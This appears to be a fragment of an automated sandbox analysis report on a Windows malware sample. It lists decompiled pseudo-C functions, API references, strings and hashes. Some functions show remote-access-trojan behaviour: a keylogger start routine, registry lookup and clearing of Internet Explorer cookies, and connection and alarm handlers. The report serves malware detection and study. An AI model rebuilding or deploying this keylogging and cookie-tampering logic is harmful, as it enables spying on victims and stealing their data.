				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0x46a00c; // 0x1e1e4200
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x46b800 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x46b800 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E0043F3A5(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x46b800 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x46b800 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x46b800 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E00443630( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E00443630();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return L0042FD1B(_v8 ^ _t136);
			}

0x00444b76
0x00444b7d
0x00444b80
0x00444b88
0x00444b8c
0x00444b98
0x00444b9b
0x00444b9e
0x00444ba5
0x00444bad
0x00444bb0
0x00444bb6
0x00444bbc
0x00444bc1
0x00444bc3
0x00444bc6
0x00444bcb
0x00444bd5
0x00444bdc
0x00444bdf
0x00444be6
0x00444bed
0x00444c19
0x00444c3f
0x00444c41
0x00000000
0x00444c1b
0x00444c1e
0x00444ce5
0x00444cf1
0x00444cfc
0x00444d01
0x00444c24
0x00444c2b
0x00444c30
0x00444c36
0x00444c3c
0x00000000
0x00444c3c
0x00444c36
0x00444c1e
0x00444bef
0x00444bf3
0x00444bf6
0x00444bfc
0x00444bfe
0x00444c01
0x00444c05
0x00444c42
0x00444c45
0x00444c46
0x00444c4b
0x00444c51
0x00444c57
0x00444c66
0x00444c6c
0x00444c72
0x00444c77
0x00444c93
0x00444d06
0x00444d0c
0x00444c95
0x00444c9d
0x00444ca6
0x00444cac
0x00000000
0x00444cae
0x00444cb0
0x00444cb3
0x00444ccc
0x00000000
0x00444cce
0x00444cd2
0x00444cd4
0x00444cd7
0x00000000
0x00444cd7
0x00444cd2
0x00444ccc
0x00444cac
0x00444ca6
0x00444c93
0x00444c77
0x00444c51
0x00000000
0x00444cda
0x00444cda
0x00444d0e
0x00444d20

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,004452E3,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00444BB0
__fassign.LIBCMT ref: 00444C2B
__fassign.LIBCMT ref: 00444C46
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00444C6C
WriteFile.KERNEL32(?,FF8BC35D,00000000,004452E3,00000000,?,?,?,?,?,?,?,?,?,004452E3,?), ref: 00444C8B
WriteFile.KERNEL32(?,?,00000001,004452E3,00000000,?,?,?,?,?,?,?,?,?,004452E3,?), ref: 00444CC4

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 1988048004699f2f7593a450744e0e121896bcf0cc6bc31cfe112c82181f8df4
Instruction ID: e328608ab5ff3e249bba56c64f9ea87ddb18b4882b1b7872db0bfde0b7a2e7dd
Opcode Fuzzy Hash: 1988048004699f2f7593a450744e0e121896bcf0cc6bc31cfe112c82181f8df4
Instruction Fuzzy Hash: 4051B1B0E00249AFEB10CFA8D885BEEBBB8EF49304F14416BE555E7251E7349941CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040A409, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040A409(void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v340;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t20;
				int _t34;
				void* _t40;
				void* _t41;
				char* _t42;
				void* _t48;
				char* _t55;
				void* _t59;
				void* _t61;
				void* _t62;

				_t42 =  &_v28;
				E004020D5(_t40, _t42);
				_push(_t42);
				_t41 = 0;
				_t17 = E004108E2( &_v52, 0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", "Cookies");
				_t62 = _t61 + 0xc;
				E00401FD1( &_v28, 0x80000001, _t59, _t17);
				E00401FC7();
				_t58 = 0x45f6bc;
				_t20 = E00405A6F(0x45f6bc);
				_t66 = _t20;
				if(_t20 == 0) {
					ExpandEnvironmentStringsA(L00401F95( &_v28),  &_v340, 0x104);
					__eflags = PathFileExistsA( &_v340);
					if(__eflags == 0) {
						goto L1;
					} else {
						E00402084(0,  &_v52,  &_v340);
						_t58 =  &_v52;
						_t34 = E00417754(L00401EEB(E004172DA( &_v76,  &_v52)));
						L00401EF0();
						_t55 =  &_v52;
						E00401FC7();
						__eflags = _t34;
						if(__eflags == 0) {
							_push(_t55);
							_push(_t55);
							__eflags = E0040A713();
							if(__eflags != 0) {
								_t41 = 1;
								E00402084(1, _t62 - 0x18, "\n[IE cookies cleared!]");
								E0040A6EF(1,  &_v52, __eflags);
								goto L8;
							}
						} else {
							_t48 = _t62 - 0x18;
							_push("\n[IE cookies cleared!]");
							goto L2;
						}
					}
				} else {
					L1:
					_t48 = _t62 - 0x18;
					_push("\n[IE cookies not found]");
					L2:
					E00402084(_t41, _t48);
					E0040A6EF(_t41, _t58, _t66);
					_t41 = 1;
					L8:
				}
				E00401FC7();
				return _t41;
			}

0x0040a412
0x0040a417
0x0040a41c
0x0040a42f
0x0040a431
0x0040a436
0x0040a43d
0x0040a445
0x0040a44a
0x0040a452
0x0040a457
0x0040a459
0x0040a48b
0x0040a49e
0x0040a4a0
0x00000000
0x0040a4a2
0x0040a4ac
0x0040a4b1
0x0040a4c5
0x0040a4cf
0x0040a4d4
0x0040a4d7
0x0040a4dc
0x0040a4de
0x0040a4ef
0x0040a4f0
0x0040a4f6
0x0040a4f8
0x0040a4fd
0x0040a506
0x0040a50b
0x00000000
0x0040a50b
0x0040a4e0
0x0040a4e3
0x0040a4e5
0x00000000
0x0040a4e5
0x0040a4de
0x0040a45b
0x0040a45b
0x0040a45e
0x0040a460
0x0040a465
0x0040a465
0x0040a46a
0x0040a46f
0x0040a510
0x0040a510
0x0040a516
0x0040a522

APIs

Part of subcall function 004108E2: RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,00000000,00000000), ref: 00410904
Part of subcall function 004108E2: RegQueryValueExA.KERNELBASE(00000000,?,00000000,00000000,?,00000400), ref: 00410923
Part of subcall function 004108E2: RegCloseKey.ADVAPI32(00000000), ref: 0041092C

ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040A48B
PathFileExistsA.SHLWAPI(?), ref: 0040A498

Strings

Cookies, xrefs: 0040A41D
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, xrefs: 0040A422
[IE cookies cleared!], xrefs: 0040A4E5, 0040A501
[IE cookies not found], xrefs: 0040A460

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
API String ID: 1133728706-4073444585
Opcode ID: a701b72457d3b8d5ecc1e7ddda00a155a800f76ad45ae6f6e7df9f24864e4db5
Instruction ID: 0404135b92c53f53d421c2624bcb9c4f004ba22d2f22d8914b52eea1ab551b62
Opcode Fuzzy Hash: a701b72457d3b8d5ecc1e7ddda00a155a800f76ad45ae6f6e7df9f24864e4db5
Instruction Fuzzy Hash: D0218E31A102056ACB14F7F1CC5B9EE7768AF14309F44013EF901B71D3EA799A598A9A

Uniqueness

Uniqueness Score: -1.00%

Function 004501D3, Relevance: 10.6, APIs: 7, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E004501D3(char* _a4, short* _a8) {
				int _v8;
				void* __ecx;
				void* __esi;
				short* _t10;
				short* _t14;
				int _t15;
				short* _t16;
				void* _t26;
				int _t27;
				void* _t29;
				short* _t35;
				short* _t39;
				short* _t40;

				_push(_t29);
				if(_a4 != 0) {
					_t39 = _a8;
					__eflags = _t39;
					if(__eflags != 0) {
						_push(_t26);
						E004420AE(_t29, _t39, __eflags);
						asm("sbb ebx, ebx");
						_t35 = 0;
						_t27 = _t26 + 1;
						 *_t39 = 0;
						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
						_v8 = _t10;
						__eflags = _t10;
						if(_t10 != 0) {
							_t40 = E0043F98C(_t29, _t10 + _t10);
							__eflags = _t40;
							if(_t40 != 0) {
								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
								__eflags = _t15;
								if(_t15 != 0) {
									_t16 = _t40;
									_t40 = 0;
									_t35 = 1;
									__eflags = 1;
									 *_a8 = _t16;
								} else {
									E0043A4CE(GetLastError());
								}
							}
							E004401F5(_t40);
							_t14 = _t35;
						} else {
							E0043A4CE(GetLastError());
							_t14 = 0;
						}
					} else {
						 *((intOrPtr*)(E0043A504())) = 0x16;
						E0043695D();
						_t14 = 0;
					}
					return _t14;
				}
				 *((intOrPtr*)(E0043A504())) = 0x16;
				E0043695D();
				return 0;
			}

0x004501d8
0x004501dd
0x004501f7
0x004501fa
0x004501fc
0x00450215
0x00450217
0x0045021e
0x00450220
0x00450229
0x0045022a
0x0045022e
0x00450234
0x00450237
0x00450239
0x00450253
0x00450256
0x00450258
0x00450265
0x0045026b
0x0045026d
0x00450281
0x00450283
0x00450287
0x00450287
0x00450288
0x0045026f
0x00450276
0x0045027b
0x0045026d
0x0045028b
0x00450290
0x0045023b
0x00450242
0x00450247
0x00450247
0x004501fe
0x00450203
0x00450209
0x0045020e
0x0045020e
0x00000000
0x00450295
0x004501e4
0x004501ea
0x00000000

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 502ea4561571e7386248578a5bbc22e3f106b6bc00d18b9e5c1923784582d5d7
Instruction ID: 3e8c339fdf138c944f03ee87ae81e8163027b6b6686a5aa70f35362f2fa299d2
Opcode Fuzzy Hash: 502ea4561571e7386248578a5bbc22e3f106b6bc00d18b9e5c1923784582d5d7
Instruction Fuzzy Hash: B5113D765002157BDB206F729C0D92B7AACDF86762F1046ABFC19C7242DA3CCC05C679

Uniqueness

Uniqueness Score: -1.00%

Function 0040E7E5, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040E7E5(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				void* _v8;
				char _v12;
				char _v24;
				void* __esi;
				intOrPtr _t40;
				void* _t48;
				intOrPtr* _t51;

				E00430058( &_v12, 0);
				_t48 =  *0x46db84;
				_v8 = _t48;
				_t51 = E0040BA23(_a4, E0040B94C(0x46b130));
				if(_t51 != 0) {
					L5:
					E004300B0( &_v12);
					return _t51;
				} else {
					if(_t48 == 0) {
						__eflags = E0040BB55(__ebx, __edx,  &_v8, _a4) - 0xffffffff;
						if(__eflags == 0) {
							E0040B812( &_v24);
							E0043205A( &_v24, 0x46864c);
							asm("int3");
							_t40 =  *((intOrPtr*)( *[fs:0x2c]));
							__eflags =  *0x46db78 -  *((intOrPtr*)(_t40 + 4));
							if( *0x46db78 >  *((intOrPtr*)(_t40 + 4))) {
								_push(_t51);
								E0042F114(0x46db78);
								__eflags =  *0x46db78 - 0xffffffff;
								if( *0x46db78 == 0xffffffff) {
									E0040EB9C();
									E0042F49E(__eflags, 0x452871);
									E0042F0D5(0x46db78, 0x46db78);
								}
							}
							return 0x46db7c;
						} else {
							_t51 = _v8;
							 *0x46db84 = _t51;
							 *((intOrPtr*)( *_t51 + 4))();
							E00430269(__eflags, _t51);
							goto L5;
						}
					} else {
						_t51 = _t48;
						goto L5;
					}
				}
			}

0x0040e7f2
0x0040e7f7
0x0040e802
0x0040e813
0x0040e817
0x0040e84b
0x0040e84e
0x0040e85a
0x0040e819
0x0040e81b
0x0040e82f
0x0040e832
0x0040e85e
0x0040e86c
0x0040e871
0x0040e878
0x0040e87f
0x0040e885
0x0040e887
0x0040e88e
0x0040e893
0x0040e89b
0x0040e89d
0x0040e8a7
0x0040e8ad
0x0040e8b3
0x0040e8b4
0x0040e8ba
0x0040e834
0x0040e834
0x0040e839
0x0040e841
0x0040e845
0x00000000
0x0040e84a
0x0040e81d
0x0040e81d
0x00000000
0x0040e81d
0x0040e81b

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040E7F2
int.LIBCPMT ref: 0040E805

Part of subcall function 0040B94C: std::_Lockit::_Lockit.LIBCPMT ref: 0040B95D
Part of subcall function 0040B94C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040B977

std::locale::_Getfacet.LIBCPMT ref: 0040E80E
std::_Facet_Register.LIBCPMT ref: 0040E845
std::_Lockit::~_Lockit.LIBCPMT ref: 0040E84E
__CxxThrowException@8.LIBVCRUNTIME ref: 0040E86C
__Init_thread_footer.LIBCMT ref: 0040E8AD

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetInit_thread_footerRegisterThrowstd::locale::_
String ID:
API String ID: 2409581025-0
Opcode ID: e7a0018a1746f9c7bf4673166abd77dce41b100f788e83672023b9d031f69d2e
Instruction ID: 03fd642756e00294ec4acf8aadaa37b4638c280f2e7f5516d862d72f379d1b29
Opcode Fuzzy Hash: e7a0018a1746f9c7bf4673166abd77dce41b100f788e83672023b9d031f69d2e
Instruction Fuzzy Hash: 7C21D332E001149BC714FB69D906A9E77B8DB44724B60417FE800B72D2EB78AD01879E

Uniqueness

Uniqueness Score: -1.00%

Function 00409634, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74
timeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00409634(void* __ebx, void* __ecx, void* __eflags, char _a4) {
				struct _SYSTEMTIME _v20;
				char _v44;
				char _v68;
				void* __edi;
				void* __esi;
				WCHAR* _t33;
				void* _t65;
				void* _t67;
				void* _t70;

				_t70 = __eflags;
				_t42 = __ebx;
				_t67 = __ecx;
				GetLocalTime( &_v20);
				L00401EFA( &_a4, _t26, _t67, E004030A6(__ebx,  &_v44, L00409E69( &_v68, L"\r\n[%04i/%02i/%02i %02i:%02i:%02i ", _t70,  &_a4), _t65, _t70, L"]\r\n"));
				L00401EF0();
				L00401EF0();
				_push(0x64 + E00402489() * 2);
				_t33 = E004394F6( &_a4);
				_t66 = _t33;
				_push(_v20.wSecond & 0x0000ffff);
				_push(_v20.wMinute & 0x0000ffff);
				_push(_v20.wHour & 0x0000ffff);
				_push(_v20.wDay & 0x0000ffff);
				_push(_v20.wMonth & 0x0000ffff);
				_push(_v20.wYear & 0x0000ffff);
				wsprintfW(_t33, L00401EEB( &_a4));
				if( *((char*)(_t67 + 0x49)) != 0) {
					E0040766C(__ebx, _t67 + 4, _t66, _t66);
				}
				if( *((char*)(_t67 + 0x4a)) != 0) {
					E0040766C(_t42, _t67 + 0x1c, _t66, _t66);
					SetEvent( *(_t67 + 0x3c));
				}
				L004394F1(_t66);
				return L00401EF0();
			}

0x00409634
0x00409634
0x0040963f
0x00409642
0x0040966e
0x00409676
0x0040967e
0x00409692
0x00409693
0x0040969d
0x004096a3
0x004096a8
0x004096ad
0x004096b2
0x004096b7
0x004096b8
0x004096c3
0x004096d0
0x004096d6
0x004096d6
0x004096df
0x004096e5
0x004096ed
0x004096ed
0x004096f4
0x00409707

APIs

GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642

Part of subcall function 00409E69: char_traits.LIBCPMT ref: 00409E79

wsprintfW.USER32 ref: 004096C3
SetEvent.KERNEL32(?,00000000), ref: 004096ED

Strings

[%04i/%02i/%02i %02i:%02i:%02i , xrefs: 0040964B
], xrefs: 00409650
Offline Keylogger Started, xrefs: 0040963B

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: EventLocalTimechar_traitswsprintf
String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
API String ID: 3003339404-248792730
Opcode ID: ca61a9da6b4990f96a699c8070fe04a4003c35820f2ebf99f622e66c3a4d0d69
Instruction ID: dd13208d924f003fd79d0c2a63de2e9b71645c7df6fae77663c0b624719a6389
Opcode Fuzzy Hash: ca61a9da6b4990f96a699c8070fe04a4003c35820f2ebf99f622e66c3a4d0d69
Instruction Fuzzy Hash: 7021A4724001186AC728EBA5EC958FF77B9AF08355F00413FF847621D2EE78AA45D768

Uniqueness

Uniqueness Score: -1.00%

Function 0044917A, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044917A(intOrPtr _a4) {
				void* _t18;
				intOrPtr _t45;

				_t45 = _a4;
				if(_t45 != 0) {
					L00448EC1(_t45, 7);
					_t2 = _t45 + 0x1c; // 0x1c
					L00448EC1(_t2, 7);
					_t3 = _t45 + 0x38; // 0x38
					L00448EC1(_t3, 0xc);
					_t4 = _t45 + 0x68; // 0x68
					L00448EC1(_t4, 0xc);
					_t5 = _t45 + 0x98; // 0x98
					L00448EC1(_t5, 2);
					E004401F5( *((intOrPtr*)(_t45 + 0xa0)));
					E004401F5( *((intOrPtr*)(_t45 + 0xa4)));
					E004401F5( *((intOrPtr*)(_t45 + 0xa8)));
					_t9 = _t45 + 0xb4; // 0xb4
					L00448EC1(_t9, 7);
					_t10 = _t45 + 0xd0; // 0xd0
					L00448EC1(_t10, 7);
					_t11 = _t45 + 0xec; // 0xec
					L00448EC1(_t11, 0xc);
					_t12 = _t45 + 0x11c; // 0x11c
					L00448EC1(_t12, 0xc);
					_t13 = _t45 + 0x14c; // 0x14c
					L00448EC1(_t13, 2);
					E004401F5( *((intOrPtr*)(_t45 + 0x154)));
					E004401F5( *((intOrPtr*)(_t45 + 0x158)));
					E004401F5( *((intOrPtr*)(_t45 + 0x15c)));
					return E004401F5( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x00449180
0x00449185
0x0044918e
0x00449193
0x00449199
0x0044919e
0x004491a4
0x004491a9
0x004491af
0x004491b4
0x004491bd
0x004491c8
0x004491d3
0x004491de
0x004491e3
0x004491ec
0x004491f1
0x004491fa
0x00449202
0x0044920b
0x00449210
0x00449219
0x0044921e
0x00449227
0x00449232
0x0044923d
0x00449248
0x00000000
0x00449258
0x0044925d

APIs

Part of subcall function 00448EC1: _free.LIBCMT ref: 00448EEA

_free.LIBCMT ref: 004491C8

Part of subcall function 004401F5: RtlFreeHeap.NTDLL(00000000,00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000), ref: 0044020B
Part of subcall function 004401F5: GetLastError.KERNEL32(00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000,00000000), ref: 0044021D

_free.LIBCMT ref: 004491D3
_free.LIBCMT ref: 004491DE
_free.LIBCMT ref: 00449232
_free.LIBCMT ref: 0044923D
_free.LIBCMT ref: 00449248
_free.LIBCMT ref: 00449253

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5569464c6c268c2a743bdaa509ba4960f6d5677ae10f9c6a881df30bb007768e
Instruction ID: d0ac5bec4300d42e5daa1f0178d5914e2472619a840d7a0986f756f09d30ade7
Opcode Fuzzy Hash: 5569464c6c268c2a743bdaa509ba4960f6d5677ae10f9c6a881df30bb007768e
Instruction Fuzzy Hash: A7115172940B04BAFA20BBB2CC47FCF779CAF00705F50081EB39AA6052DE7EB5244658

Uniqueness

Uniqueness Score: -1.00%

Function 004350B5, Relevance: 10.6, APIs: 7, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E004350B5(void* __ecx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t25;
				void* _t28;

				if( *0x46a090 != 0xffffffff) {
					_t25 = GetLastError();
					_t11 = E00431BD8(__eflags,  *0x46a090);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = L00431C12(__eflags,  *0x46a090, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_t28 = E0043F348(_t16, 1, 0x28);
								__eflags = _t28;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									L00431C12(__eflags,  *0x46a090, 0);
								} else {
									__eflags = L00431C12(__eflags,  *0x46a090, _t28);
									if(__eflags != 0) {
										_t11 = _t28;
										_t28 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E004401F5(_t28);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t25);
					return _t11;
				} else {
					return 0;
				}
			}

0x004350bc
0x004350cf
0x004350d6
0x004350d9
0x004350dc
0x004350f5
0x004350f5
0x004350de
0x004350de
0x004350e0
0x004350ea
0x004350f0
0x004350f1
0x004350f3
0x00435103
0x00435107
0x00435109
0x0043511d
0x0043511d
0x00435126
0x0043510b
0x00435119
0x0043511b
0x0043512f
0x00435131
0x00435131
0x00000000
0x00000000
0x00000000
0x0043511b
0x00435134
0x00000000
0x00000000
0x00000000
0x004350f3
0x004350e0
0x0043513c
0x00435146
0x004350be
0x004350c0
0x004350c0

APIs

GetLastError.KERNEL32(?,?,004350AC,004321F2), ref: 004350C3
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004350D1
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004350EA
SetLastError.KERNEL32(00000000,?,004350AC,004321F2), ref: 0043513C

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 3375aaeb76c48a15ccd027394cd9d51d38e1641731e5ceb62c1a1a32efac3080
Instruction ID: a515c6194843fa53ce6413da374b9e5764b9e55810f12d35b037beed10178e82
Opcode Fuzzy Hash: 3375aaeb76c48a15ccd027394cd9d51d38e1641731e5ceb62c1a1a32efac3080
Instruction Fuzzy Hash: EC01F532549B115EEA152E79AC4562B2654DB0D779F20223FF220511F1FE594C11564E

Uniqueness

Uniqueness Score: -1.00%

Function 0040511B, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040511B(void* __ecx, void* __edi, char _a4) {
				void* _t17;
				void* _t22;
				void* _t23;

				_t22 = __ecx;
				if( *((char*)(__ecx + 0x50)) == 0) {
					return 0;
				}
				if(_a4 == 0) {
					_t24 = _t23 - 0x18;
					E00402084(_t17, _t23 - 0x18, "Connection KeepAlive disabled");
					E00402084(_t17, _t24 - 0x18, "[WARNING]");
					L00416C80(_t17, __edi);
				}
				 *(_t22 + 0x58) = CreateEventA(0, 0, 0, 0);
				SetEvent( *(_t22 + 0x54));
				WaitForSingleObject( *(_t22 + 0x58), 0xffffffff);
				CloseHandle( *(_t22 + 0x58));
				return 1;
			}

0x0040511f
0x00405125
0x00000000
0x00405183
0x0040512b
0x0040512d
0x00405137
0x00405146
0x0040514b
0x00405150
0x00405162
0x00405165
0x00405170
0x00405179
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,0046C2E8,?,00404CA9,00000001,0046C2E8,00404C56,00000000,00000000,00000000), ref: 00405159
SetEvent.KERNEL32(?,?,00404CA9,00000001,0046C2E8,00404C56,00000000,00000000,00000000), ref: 00405165
WaitForSingleObject.KERNEL32(?,000000FF,?,00404CA9,00000001,0046C2E8,00404C56,00000000,00000000,00000000), ref: 00405170
CloseHandle.KERNEL32(?,?,00404CA9,00000001,0046C2E8,00404C56,00000000,00000000,00000000), ref: 00405179

Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A

Strings

Connection KeepAlive disabled, xrefs: 00405132
[WARNING], xrefs: 00405141

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
String ID: Connection KeepAlive disabled$[WARNING]
API String ID: 2993684571-804309475
Opcode ID: 6700614dca504244a55bd319c10cf8dd84f4c90e38274ba8f930ec3cb829daee
Instruction ID: 60a08de37f047c10c4ebd60d286cc91250b6658f2aab9bb1a866a2a778ec74b8
Opcode Fuzzy Hash: 6700614dca504244a55bd319c10cf8dd84f4c90e38274ba8f930ec3cb829daee
Instruction Fuzzy Hash: E0F0C272900B407FDB103BB59C0EA7B7B98DB0135AF04057AFD41926E2DAB9D8548B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00416737, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30
sleepCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00416737(WCHAR* __ecx) {
				void* __edi;
				void* _t7;
				void* _t11;
				WCHAR* _t13;
				void* _t15;

				_t16 = _t15 - 0x18;
				_t13 = __ecx;
				E00402084(_t7, _t15 - 0x18, "Alarm has been triggered!");
				E00402084(_t7, _t16 - 0x18, "[ALARM]");
				L00416C80(_t7, _t11);
				PlaySoundW(_t13, GetModuleHandleA(0), 0x20009);
				Sleep(0x2710);
				return PlaySoundW(0, 0, 0);
			}

0x00416739
0x0041673c
0x00416745
0x00416754
0x00416759
0x00416777
0x0041677e
0x0041678b

APIs

Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A

GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00416769
PlaySoundW.WINMM(00000000,00000000), ref: 00416777
Sleep.KERNEL32(00002710), ref: 0041677E
PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00416787

Strings

Alarm has been triggered!, xrefs: 00416740
[ALARM], xrefs: 0041674F

Memory Dump Source

